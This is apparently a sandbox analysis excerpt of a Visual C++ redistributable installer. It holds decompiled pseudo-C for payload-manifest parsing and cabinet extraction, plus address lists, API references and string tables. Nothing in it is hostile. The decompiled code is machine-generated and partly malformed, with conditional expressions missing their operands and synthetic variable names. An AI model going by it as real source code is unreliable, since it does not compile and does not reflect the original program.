                                                                          																								_push("Failed to hex decode @CertificateRootPublicKeyIdentifier.");
                                                                          																								goto L81;
                                                                          																							} else {
                                                                          																								goto L39;
                                                                          																							}
                                                                          																						}
                                                                          																					}
                                                                          																				} else {
                                                                          																					__eflags = _t176;
                                                                          																					if(_t176 < 0) {
                                                                          																						_push("Failed to get @FileSize.");
                                                                          																						goto L81;
                                                                          																					} else {
                                                                          																						_t51 = _t175 + 0x10; // 0x1534d
                                                                          																						_t176 = E00012A22(_v8, 0, _t51);
                                                                          																						__eflags = _t176;
                                                                          																						if(_t176 < 0) {
                                                                          																							_push("Failed to parse @FileSize.");
                                                                          																							goto L81;
                                                                          																						} else {
                                                                          																							goto L36;
                                                                          																						}
                                                                          																					}
                                                                          																				}
                                                                          																			} else {
                                                                          																				goto L32;
                                                                          																			}
                                                                          																		}
                                                                          																	} else {
                                                                          																		goto L29;
                                                                          																	}
                                                                          																}
                                                                          															} else {
                                                                          																__eflags = _t176;
                                                                          																if(_t176 < 0) {
                                                                          																	_push("Failed to get @LayoutOnly.");
                                                                          																	goto L81;
                                                                          																} else {
                                                                          																	goto L27;
                                                                          																}
                                                                          															}
                                                                          														} else {
                                                                          															_t150 = E000531C7(_v12, L"Container",  &_v8); // executed
                                                                          															_t176 = _t150;
                                                                          															__eflags = _t176 - 0x80070490;
                                                                          															if(_t176 != 0x80070490) {
                                                                          																L23:
                                                                          																__eflags = _t176;
                                                                          																if(_t176 < 0) {
                                                                          																	_push("Failed to get @Container.");
                                                                          																	L81:
                                                                          																	_push(_t176);
                                                                          																	E0005012F();
                                                                          																} else {
                                                                          																	_t38 = _t175 + 0x3c; // 0x15379
                                                                          																	_t176 = E0001C0A9(_t162, _a8, _v8, _t38);
                                                                          																	__eflags = _t176;
                                                                          																	if(_t176 < 0) {
                                                                          																		_push(_v8);
                                                                          																		_push("Failed to to find container: %ls");
                                                                          																		L76:
                                                                          																		_push(_t176);
                                                                          																		E0005012F();
                                                                          																	} else {
                                                                          																		goto L25;
                                                                          																	}
                                                                          																}
                                                                          															} else {
                                                                          																__eflags =  *(_t175 + 4) - 2;
                                                                          																if( *(_t175 + 4) != 2) {
                                                                          																	goto L25;
                                                                          																} else {
                                                                          																	goto L23;
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          										goto L51;
                                                                          									}
                                                                          									_push("Failed to get next node.");
                                                                          									goto L81;
                                                                          								}
                                                                          								L51:
                                                                          							} else {
                                                                          								_t176 = 0x8007000e;
                                                                          								E000137D3(_t102, "payload.cpp", 0x2e, 0x8007000e);
                                                                          								_push("Failed to allocate memory for payload structs.");
                                                                          								_push(0x8007000e);
                                                                          								E0005012F();
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to get payload node count.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to select payload nodes.");
                                                                          					L2:
                                                                          					_push(_t176);
                                                                          					E0005012F();
                                                                          				}
                                                                          				_t160 = _v20;
                                                                          				if(_t160 != 0) {
                                                                          					 *((intOrPtr*)( *_t160 + 8))(_t160);
                                                                          				}
                                                                          				_t161 = _v12;
                                                                          				if(_t161 != 0) {
                                                                          					 *((intOrPtr*)( *_t161 + 8))(_t161);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t176;
                                                                          			}

                                                                          0x0001cdf1
                                                                          0x0001ce0c
                                                                          0x0001ce0e
                                                                          0x0001ce11
                                                                          0x0001ce28
                                                                          0x0001ce2a
                                                                          0x0001ce2d
                                                                          0x0001d0f1
                                                                          0x0001d0f4
                                                                          0x0001d0f9
                                                                          0x00000000
                                                                          0x0001ce33
                                                                          0x0001ce33
                                                                          0x00000000
                                                                          0x0001ce33
                                                                          0x0001ce13
                                                                          0x0001ce13
                                                                          0x00000000
                                                                          0x0001ce13
                                                                          0x0001cdf3
                                                                          0x0001cdf3
                                                                          0x0001ce3a
                                                                          0x0001ce3a
                                                                          0x0001ce3e
                                                                          0x0001ce82
                                                                          0x0001ce82
                                                                          0x0001ce93
                                                                          0x0001ce95
                                                                          0x0001ce9b
                                                                          0x0001cea5
                                                                          0x0001cea5
                                                                          0x0001ceb6
                                                                          0x0001ceb8
                                                                          0x0001cebe
                                                                          0x0001cec6
                                                                          0x0001cec6
                                                                          0x0001cec8
                                                                          0x0001d0ea
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cec0
                                                                          0x0001cec0
                                                                          0x0001cec4
                                                                          0x0001cece
                                                                          0x0001cece
                                                                          0x0001cedf
                                                                          0x0001cee1
                                                                          0x0001cee7
                                                                          0x0001ceef
                                                                          0x0001ceef
                                                                          0x0001cef1
                                                                          0x0001d0e3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cee9
                                                                          0x0001cee9
                                                                          0x0001ceed
                                                                          0x0001cef7
                                                                          0x0001cf08
                                                                          0x0001cf0a
                                                                          0x0001cf10
                                                                          0x0001cf32
                                                                          0x0001cf43
                                                                          0x0001cf45
                                                                          0x0001cf4b
                                                                          0x0001cf6f
                                                                          0x0001cf80
                                                                          0x0001cf82
                                                                          0x0001cf88
                                                                          0x0001cfac
                                                                          0x0001cfbd
                                                                          0x0001cfbf
                                                                          0x0001cfc1
                                                                          0x0001d0dc
                                                                          0x00000000
                                                                          0x0001cfc7
                                                                          0x0001cfc7
                                                                          0x0001cfcb
                                                                          0x0001cfd7
                                                                          0x0001cfd9
                                                                          0x0001cfdb
                                                                          0x0001d0d5
                                                                          0x00000000
                                                                          0x0001cfe1
                                                                          0x0001cff2
                                                                          0x0001cff4
                                                                          0x0001cffa
                                                                          0x0001d01d
                                                                          0x0001d01d
                                                                          0x0001d020
                                                                          0x0001d022
                                                                          0x0001d027
                                                                          0x0001d02a
                                                                          0x0001d02a
                                                                          0x0001d02a
                                                                          0x0001d02a
                                                                          0x0001d034
                                                                          0x0001d035
                                                                          0x0001d038
                                                                          0x0001d03b
                                                                          0x0001d03e
                                                                          0x0001d041
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cffc
                                                                          0x0001cffc
                                                                          0x0001cffe
                                                                          0x0001d0ce
                                                                          0x00000000
                                                                          0x0001d004
                                                                          0x0001d004
                                                                          0x0001d013
                                                                          0x0001d015
                                                                          0x0001d017
                                                                          0x0001d0c7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001d017
                                                                          0x0001cffe
                                                                          0x0001cffa
                                                                          0x0001cfdb
                                                                          0x0001cf8a
                                                                          0x0001cf8a
                                                                          0x0001cf8c
                                                                          0x0001d0c0
                                                                          0x00000000
                                                                          0x0001cf92
                                                                          0x0001cf92
                                                                          0x0001cf96
                                                                          0x0001cfa2
                                                                          0x0001cfa4
                                                                          0x0001cfa6
                                                                          0x0001d0b9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cfa6
                                                                          0x0001cf8c
                                                                          0x0001cf4d
                                                                          0x0001cf4d
                                                                          0x0001cf4f
                                                                          0x0001d0b2
                                                                          0x00000000
                                                                          0x0001cf55
                                                                          0x0001cf55
                                                                          0x0001cf59
                                                                          0x0001cf65
                                                                          0x0001cf67
                                                                          0x0001cf69
                                                                          0x0001d0ab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cf69
                                                                          0x0001cf4f
                                                                          0x0001cf12
                                                                          0x0001cf12
                                                                          0x0001cf14
                                                                          0x0001d0a4
                                                                          0x00000000
                                                                          0x0001cf1a
                                                                          0x0001cf1a
                                                                          0x0001cf28
                                                                          0x0001cf2a
                                                                          0x0001cf2c
                                                                          0x0001d09a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cf2c
                                                                          0x0001cf14
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ceed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cec4
                                                                          0x0001ce9d
                                                                          0x0001ce9d
                                                                          0x0001ce9f
                                                                          0x0001d090
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ce9f
                                                                          0x0001ce40
                                                                          0x0001ce4c
                                                                          0x0001ce51
                                                                          0x0001ce53
                                                                          0x0001ce59
                                                                          0x0001ce61
                                                                          0x0001ce61
                                                                          0x0001ce63
                                                                          0x0001d086
                                                                          0x0001d126
                                                                          0x0001d126
                                                                          0x0001d127
                                                                          0x0001ce69
                                                                          0x0001ce69
                                                                          0x0001ce78
                                                                          0x0001ce7a
                                                                          0x0001ce7c
                                                                          0x0001d07c
                                                                          0x0001d07f
                                                                          0x0001d0fe
                                                                          0x0001d0fe
                                                                          0x0001d0ff
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ce7c
                                                                          0x0001ce5b
                                                                          0x0001ce5b
                                                                          0x0001ce5f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ce5f
                                                                          0x0001ce59
                                                                          0x0001ce3e
                                                                          0x0001cdf1
                                                                          0x0001cdd0
                                                                          0x0001cdb5
                                                                          0x00000000
                                                                          0x0001cd9a
                                                                          0x0001d121
                                                                          0x00000000
                                                                          0x0001d121
                                                                          0x0001d049
                                                                          0x0001cd30
                                                                          0x0001cd30
                                                                          0x0001cd3d
                                                                          0x0001cd42
                                                                          0x0001cd47
                                                                          0x0001cd48
                                                                          0x0001cd4e
                                                                          0x0001d04a
                                                                          0x0001cd09
                                                                          0x0001cd09
                                                                          0x00000000
                                                                          0x0001cd09
                                                                          0x0001cce4
                                                                          0x0001cce4
                                                                          0x0001cce9
                                                                          0x0001cce9
                                                                          0x0001ccea
                                                                          0x0001ccf0
                                                                          0x0001d04b
                                                                          0x0001d050
                                                                          0x0001d055
                                                                          0x0001d055
                                                                          0x0001d058
                                                                          0x0001d05d
                                                                          0x0001d062
                                                                          0x0001d062
                                                                          0x0001d069
                                                                          0x0001d06e
                                                                          0x0001d06e
                                                                          0x0001d079

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,00015355,00000000,0005CA64,0001533D,00000000), ref: 0001CDEC
                                                                          Strings
                                                                          • Invalid value for @Packaging: %ls, xrefs: 0001D0F9
                                                                          • Failed to get @CertificateRootThumbprint., xrefs: 0001D0C0
                                                                          • Failed to find catalog., xrefs: 0001D0C7
                                                                          • Payload, xrefs: 0001CCD1
                                                                          • Failed to get @Container., xrefs: 0001D086
                                                                          • Failed to allocate memory for payload structs., xrefs: 0001CD42
                                                                          • download, xrefs: 0001CDDE
                                                                          • Failed to get @DownloadUrl., xrefs: 0001D0E3
                                                                          • Failed to hex decode the Payload/@Hash., xrefs: 0001D0D5
                                                                          • Failed to hex decode @CertificateRootThumbprint., xrefs: 0001D0B9
                                                                          • CertificateRootPublicKeyIdentifier, xrefs: 0001CF36
                                                                          • Packaging, xrefs: 0001CDBF
                                                                          • FileSize, xrefs: 0001CEFB
                                                                          • Failed to get @FilePath., xrefs: 0001D113
                                                                          • Container, xrefs: 0001CE44
                                                                          • DownloadUrl, xrefs: 0001CED2
                                                                          • FilePath, xrefs: 0001CDA4
                                                                          • Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0001D0AB
                                                                          • CertificateRootThumbprint, xrefs: 0001CF73
                                                                          • Failed to select payload nodes., xrefs: 0001CCE4
                                                                          • Failed to get next node., xrefs: 0001D121
                                                                          • Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 0001D0B2
                                                                          • Failed to get @LayoutOnly., xrefs: 0001D090
                                                                          • SourcePath, xrefs: 0001CEA9
                                                                          • Catalog, xrefs: 0001CFE5
                                                                          • Failed to parse @FileSize., xrefs: 0001D09A
                                                                          • LayoutOnly, xrefs: 0001CE86
                                                                          • Hash, xrefs: 0001CFB0
                                                                          • Failed to get @SourcePath., xrefs: 0001D0EA
                                                                          • external, xrefs: 0001CE1A
                                                                          • Failed to get payload node count., xrefs: 0001CD09
                                                                          • Failed to get @Packaging., xrefs: 0001D10C
                                                                          • embedded, xrefs: 0001CDFE
                                                                          • Failed to to find container: %ls, xrefs: 0001D07F
                                                                          • Failed to get @Hash., xrefs: 0001D0DC
                                                                          • Failed to get @Id., xrefs: 0001D11A
                                                                          • Failed to get @FileSize., xrefs: 0001D0A4
                                                                          • Failed to get @Catalog., xrefs: 0001D0CE
                                                                          • payload.cpp, xrefs: 0001CD38
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateCompareProcessString
                                                                          • String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
                                                                          • API String ID: 1171520630-3127305756
                                                                          • Opcode ID: b619964a9a0782ecc4c274e097a5991f07018c7b7d07996253a56f34af3b280b
                                                                          • Instruction ID: 10df2bba6ea5f061e053a6e5e0dad8204166730e038a5005a2bfb03ccf904f2b
                                                                          • Opcode Fuzzy Hash: b619964a9a0782ecc4c274e097a5991f07018c7b7d07996253a56f34af3b280b
                                                                          • Instruction Fuzzy Hash: E8C1C571D4162AFBDB219A50CC41FEF7BA4AB08751F100266FE00BB191C775EE85D791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 682 30a77-30a90 SetEvent 683 30a92-30ac5 call 137d3 682->683 684 30aca-30ad6 WaitForSingleObject 682->684 705 30e25-30e26 call 5012f 683->705 685 30b10-30b1b ResetEvent 684->685 686 30ad8-30b0b call 137d3 684->686 687 30b55-30b5b 685->687 688 30b1d-30b50 call 137d3 685->688 686->705 691 30b96-30baf call 121bc 687->691 692 30b5d-30b60 687->692 688->705 707 30bb1-30bc5 call 5012f 691->707 708 30bca-30bd5 SetEvent 691->708 697 30b62-30b87 call 137d3 call 5012f 692->697 698 30b8c-30b91 692->698 712 30e2b-30e2c 697->712 700 30e2d-30e2f 698->700 706 30e30-30e40 700->706 705->712 707->700 714 30c00-30c0c WaitForSingleObject 708->714 715 30bd7-30bf6 708->715 712->700 719 30c37-30c42 ResetEvent 714->719 720 30c0e-30c2d 714->720 715->714 721 30c44-30c63 719->721 722 30c6d-30c74 719->722 720->719 721->722 725 30ce3-30d05 CreateFileW 722->725 726 30c76-30c79 722->726 728 30d42-30d57 SetFilePointerEx 725->728 729 30d07-30d38 call 137d3 725->729 730 30ca0-30ca7 call 138d4 726->730 731 30c7b-30c7e 726->731 734 30d91-30d9c SetEndOfFile 728->734 735 30d59-30d8c call 137d3 728->735 729->728 737 30cac-30cb1 730->737 732 30c80-30c83 731->732 733 30c99-30c9b 731->733 732->698 741 30c89-30c8f 732->741 733->706 738 30dd3-30df0 SetFilePointerEx 734->738 739 30d9e-30dd1 call 137d3 734->739 735->705 742 30cb3-30ccd call 137d3 737->742 743 30cd2-30cde 737->743 738->700 744 30df2-30e20 call 137d3 738->744 739->705 741->733 742->705 743->700 744->705
                                                                          C-Code - Quality: 55%
                                                                          			E00030A77(void* __ecx, union _LARGE_INTEGER* __edx, intOrPtr _a4, union _LARGE_INTEGER* _a8) {
                                                                          				union _LARGE_INTEGER* _v8;
                                                                          				union _LARGE_INTEGER _v12;
                                                                          				int _t30;
                                                                          				void* _t34;
                                                                          				intOrPtr _t42;
                                                                          				void* _t50;
                                                                          				signed short _t52;
                                                                          				signed short _t56;
                                                                          				signed short _t59;
                                                                          				signed short _t62;
                                                                          				void* _t66;
                                                                          				intOrPtr _t68;
                                                                          				void* _t72;
                                                                          				signed short _t76;
                                                                          				void* _t77;
                                                                          				signed short _t79;
                                                                          				void* _t80;
                                                                          				signed short _t82;
                                                                          				void* _t83;
                                                                          				signed short _t86;
                                                                          				signed short _t87;
                                                                          				signed short _t88;
                                                                          				signed int _t89;
                                                                          				long _t90;
                                                                          				signed int _t93;
                                                                          				void* _t95;
                                                                          				union _LARGE_INTEGER* _t98;
                                                                          				intOrPtr _t100;
                                                                          				signed int _t103;
                                                                          
                                                                          				_t98 = __edx;
                                                                          				_push(_t89);
                                                                          				_t100 = _a4;
                                                                          				_t30 = SetEvent( *(_t100 + 0x28));
                                                                          				_t90 = _t89 | 0xffffffff;
                                                                          				if(_t30 != 0) {
                                                                          					if(WaitForSingleObject( *(_t100 + 0x24), _t90) != _t90) {
                                                                          						if(ResetEvent( *(_t100 + 0x24)) != 0) {
                                                                          							_t34 =  *((intOrPtr*)(_t100 + 0x2c)) - 1;
                                                                          							if(_t34 == 0) {
                                                                          								_t103 = E000121BC(_t98,  *((intOrPtr*)(_t100 + 0x34)), _a8->LowPart.HighPart, 0, 0xfde9);
                                                                          								if(_t103 >= 0) {
                                                                          									if(SetEvent( *(_t100 + 0x28)) != 0) {
                                                                          										if(WaitForSingleObject( *(_t100 + 0x24), _t90) != _t90) {
                                                                          											if(ResetEvent( *(_t100 + 0x24)) != 0) {
                                                                          												_t42 =  *((intOrPtr*)(_t100 + 0x2c));
                                                                          												if(_t42 == 0) {
                                                                          													_t95 = CreateFileW( *(_t100 + 0x38), 0x40000000, 1, 0, 2, 0x80, 0);
                                                                          													 *(_t100 + 0x3c) = _t95;
                                                                          													if(_t95 != _t90) {
                                                                          														_push(0);
                                                                          														asm("cdq");
                                                                          														if(SetFilePointerEx(_t95,  *_a8, _t98, 0) != 0) {
                                                                          															if(SetEndOfFile( *(_t100 + 0x3c)) != 0) {
                                                                          																_push(0);
                                                                          																asm("xorps xmm0, xmm0");
                                                                          																asm("movlpd [ebp-0x8], xmm0");
                                                                          																if(SetFilePointerEx( *(_t100 + 0x3c), _v12, _v8, 0) == 0) {
                                                                          																	_t52 = GetLastError();
                                                                          																	_t107 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
                                                                          																	_t103 =  >=  ? 0x80004005 :  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
                                                                          																	E000137D3(0x80004005, "cabextract.cpp", 0x24f, _t103);
                                                                          																	_push("Failed to set file pointer to beginning of file.");
                                                                          																	goto L40;
                                                                          																}
                                                                          															} else {
                                                                          																_t56 = GetLastError();
                                                                          																_t110 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                          																_t103 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                          																E000137D3(0x80004005, "cabextract.cpp", 0x249, _t103);
                                                                          																_push("Failed to set end of file.");
                                                                          																goto L40;
                                                                          															}
                                                                          														} else {
                                                                          															_t59 = GetLastError();
                                                                          															_t113 =  <=  ? _t59 : _t59 & 0x0000ffff | 0x80070000;
                                                                          															_t103 =  >=  ? 0x80004005 :  <=  ? _t59 : _t59 & 0x0000ffff | 0x80070000;
                                                                          															E000137D3(0x80004005, "cabextract.cpp", 0x244, _t103);
                                                                          															_push("Failed to set file pointer to end of file.");
                                                                          															goto L40;
                                                                          														}
                                                                          													} else {
                                                                          														_t62 = GetLastError();
                                                                          														_t116 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                          														_t103 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                          														E000137D3(0x80004005, "cabextract.cpp", 0x23d, _t103);
                                                                          														_push( *(_t100 + 0x38));
                                                                          														_push("Failed to create file: %ls");
                                                                          														goto L16;
                                                                          													}
                                                                          													goto L42;
                                                                          												} else {
                                                                          													_t66 = _t42 - 1;
                                                                          													if(_t66 == 0) {
                                                                          														_t68 = E000138D4( *_a8, 1); // executed
                                                                          														 *((intOrPtr*)(_t100 + 0x40)) = _t68;
                                                                          														if(_t68 != 0) {
                                                                          															 *(_t100 + 0x48) =  *(_t100 + 0x48) & 0x00000000;
                                                                          															 *(_t100 + 0x44) =  *_a8;
                                                                          														} else {
                                                                          															_t103 = 0x8007000e;
                                                                          															E000137D3(_t68, "cabextract.cpp", 0x257, 0x8007000e);
                                                                          															_push("Failed to allocate buffer for stream.");
                                                                          															goto L40;
                                                                          														}
                                                                          														goto L42;
                                                                          													} else {
                                                                          														_t72 = _t66 - 1;
                                                                          														if(_t72 == 0) {
                                                                          															_t50 = 0;
                                                                          														} else {
                                                                          															_t73 = _t72 == 1;
                                                                          															if(_t72 == 1) {
                                                                          																goto L13;
                                                                          															} else {
                                                                          																_t93 = 0x8007139f;
                                                                          																_push(0x8007139f);
                                                                          																_push(0x268);
                                                                          																goto L12;
                                                                          															}
                                                                          															goto L42;
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											} else {
                                                                          												_t76 = GetLastError();
                                                                          												_t119 =  <=  ? _t76 : _t76 & 0x0000ffff | 0x80070000;
                                                                          												_t77 = 0x80004005;
                                                                          												_t103 =  >=  ? 0x80004005 :  <=  ? _t76 : _t76 & 0x0000ffff | 0x80070000;
                                                                          												_push(_t103);
                                                                          												_push(0x232);
                                                                          												goto L8;
                                                                          											}
                                                                          										} else {
                                                                          											_t79 = GetLastError();
                                                                          											_t122 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                          											_t80 = 0x80004005;
                                                                          											_t103 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                          											_push(_t103);
                                                                          											_push(0x22d);
                                                                          											goto L5;
                                                                          										}
                                                                          									} else {
                                                                          										_t82 = GetLastError();
                                                                          										_t125 =  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
                                                                          										_t83 = 0x80004005;
                                                                          										_t103 =  >=  ? 0x80004005 :  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
                                                                          										_push(_t103);
                                                                          										_push(0x227);
                                                                          										goto L2;
                                                                          									}
                                                                          								} else {
                                                                          									_push(_a8->LowPart.HighPart);
                                                                          									_push("Failed to copy stream name: %ls");
                                                                          									L16:
                                                                          									_push(_t103);
                                                                          									E0005012F();
                                                                          									goto L42;
                                                                          								}
                                                                          							} else {
                                                                          								_t73 = _t34 == 4;
                                                                          								if(_t34 == 4) {
                                                                          									L13:
                                                                          									_t103 = 0x80004004;
                                                                          								} else {
                                                                          									_t93 = 0x8007139f;
                                                                          									_push(0x8007139f);
                                                                          									_push(0x21d);
                                                                          									L12:
                                                                          									_t103 = _t93;
                                                                          									E000137D3(_t73);
                                                                          									E0005012F(_t93, "Invalid operation for this state.", "cabextract.cpp");
                                                                          									_t90 = _t93 | 0xffffffff;
                                                                          									goto L41;
                                                                          								}
                                                                          								goto L42;
                                                                          							}
                                                                          						} else {
                                                                          							_t86 = GetLastError();
                                                                          							_t128 =  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
                                                                          							_t77 = 0x80004005;
                                                                          							_t103 =  >=  ? 0x80004005 :  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
                                                                          							_push(_t103);
                                                                          							_push(0x20f);
                                                                          							L8:
                                                                          							_push("cabextract.cpp");
                                                                          							E000137D3(_t77);
                                                                          							_push("Failed to reset begin operation event.");
                                                                          							goto L40;
                                                                          						}
                                                                          					} else {
                                                                          						_t87 = GetLastError();
                                                                          						_t131 =  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
                                                                          						_t80 = 0x80004005;
                                                                          						_t103 =  >=  ? 0x80004005 :  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
                                                                          						_push(_t103);
                                                                          						_push(0x20a);
                                                                          						L5:
                                                                          						_push("cabextract.cpp");
                                                                          						E000137D3(_t80);
                                                                          						_push("Failed to wait for begin operation event.");
                                                                          						goto L40;
                                                                          					}
                                                                          				} else {
                                                                          					_t88 = GetLastError();
                                                                          					_t134 =  <=  ? _t88 : _t88 & 0x0000ffff | 0x80070000;
                                                                          					_t83 = 0x80004005;
                                                                          					_t103 =  >=  ? 0x80004005 :  <=  ? _t88 : _t88 & 0x0000ffff | 0x80070000;
                                                                          					_push(_t103);
                                                                          					_push(0x204);
                                                                          					L2:
                                                                          					_push("cabextract.cpp");
                                                                          					E000137D3(_t83);
                                                                          					_push("Failed to set operation complete event.");
                                                                          					L40:
                                                                          					_push(_t103);
                                                                          					E0005012F();
                                                                          					L41:
                                                                          					L42:
                                                                          					_t50 = 1;
                                                                          				}
                                                                          				 *(_t100 + 0x30) = _t103;
                                                                          				_t91 =  >=  ? _t50 : _t90;
                                                                          				_t51 =  >=  ? _t50 : _t90;
                                                                          				return  >=  ? _t50 : _t90;
                                                                          			}
































                                                                          0x00030cd7
                                                                          0x00030cdb
                                                                          0x00030cb3
                                                                          0x00030cb3
                                                                          0x00030cc3
                                                                          0x00030cc8
                                                                          0x00000000
                                                                          0x00030cc8
                                                                          0x00000000
                                                                          0x00030c7b
                                                                          0x00030c7b
                                                                          0x00030c7e
                                                                          0x00030c99
                                                                          0x00030c80
                                                                          0x00030c80
                                                                          0x00030c83
                                                                          0x00000000
                                                                          0x00030c89
                                                                          0x00030c89
                                                                          0x00030c8e
                                                                          0x00030c8f
                                                                          0x00000000
                                                                          0x00030c8f
                                                                          0x00000000
                                                                          0x00030c83
                                                                          0x00030c7e
                                                                          0x00030c79
                                                                          0x00030c44
                                                                          0x00030c44
                                                                          0x00030c55
                                                                          0x00030c58
                                                                          0x00030c5f
                                                                          0x00030c62
                                                                          0x00030c63
                                                                          0x00000000
                                                                          0x00030c63
                                                                          0x00030c0e
                                                                          0x00030c0e
                                                                          0x00030c1f
                                                                          0x00030c22
                                                                          0x00030c29
                                                                          0x00030c2c
                                                                          0x00030c2d
                                                                          0x00000000
                                                                          0x00030c2d
                                                                          0x00030bd7
                                                                          0x00030bd7
                                                                          0x00030be8
                                                                          0x00030beb
                                                                          0x00030bf2
                                                                          0x00030bf5
                                                                          0x00030bf6
                                                                          0x00000000
                                                                          0x00030bf6
                                                                          0x00030bb1
                                                                          0x00030bb4
                                                                          0x00030bb7
                                                                          0x00030bbc
                                                                          0x00030bbc
                                                                          0x00030bbd
                                                                          0x00000000
                                                                          0x00030bc2
                                                                          0x00030b5d
                                                                          0x00030b5d
                                                                          0x00030b60
                                                                          0x00030b8c
                                                                          0x00030b8c
                                                                          0x00030b62
                                                                          0x00030b62
                                                                          0x00030b67
                                                                          0x00030b68
                                                                          0x00030b6d
                                                                          0x00030b72
                                                                          0x00030b74
                                                                          0x00030b7f
                                                                          0x00030b84
                                                                          0x00000000
                                                                          0x00030b84
                                                                          0x00000000
                                                                          0x00030b60
                                                                          0x00030b1d
                                                                          0x00030b1d
                                                                          0x00030b2e
                                                                          0x00030b31
                                                                          0x00030b38
                                                                          0x00030b3b
                                                                          0x00030b3c
                                                                          0x00030b41
                                                                          0x00030b41
                                                                          0x00030b46
                                                                          0x00030b4b
                                                                          0x00000000
                                                                          0x00030b4b
                                                                          0x00030ad8
                                                                          0x00030ad8
                                                                          0x00030ae9
                                                                          0x00030aec
                                                                          0x00030af3
                                                                          0x00030af6
                                                                          0x00030af7
                                                                          0x00030afc
                                                                          0x00030afc
                                                                          0x00030b01
                                                                          0x00030b06
                                                                          0x00000000
                                                                          0x00030b06
                                                                          0x00030a92
                                                                          0x00030a92
                                                                          0x00030aa3
                                                                          0x00030aa6
                                                                          0x00030aad
                                                                          0x00030ab0
                                                                          0x00030ab1
                                                                          0x00030ab6
                                                                          0x00030ab6
                                                                          0x00030abb
                                                                          0x00030ac0
                                                                          0x00030e25
                                                                          0x00030e25
                                                                          0x00030e26
                                                                          0x00030e2b
                                                                          0x00030e2d
                                                                          0x00030e2f
                                                                          0x00030e2f
                                                                          0x00030e32
                                                                          0x00030e36
                                                                          0x00030e3a
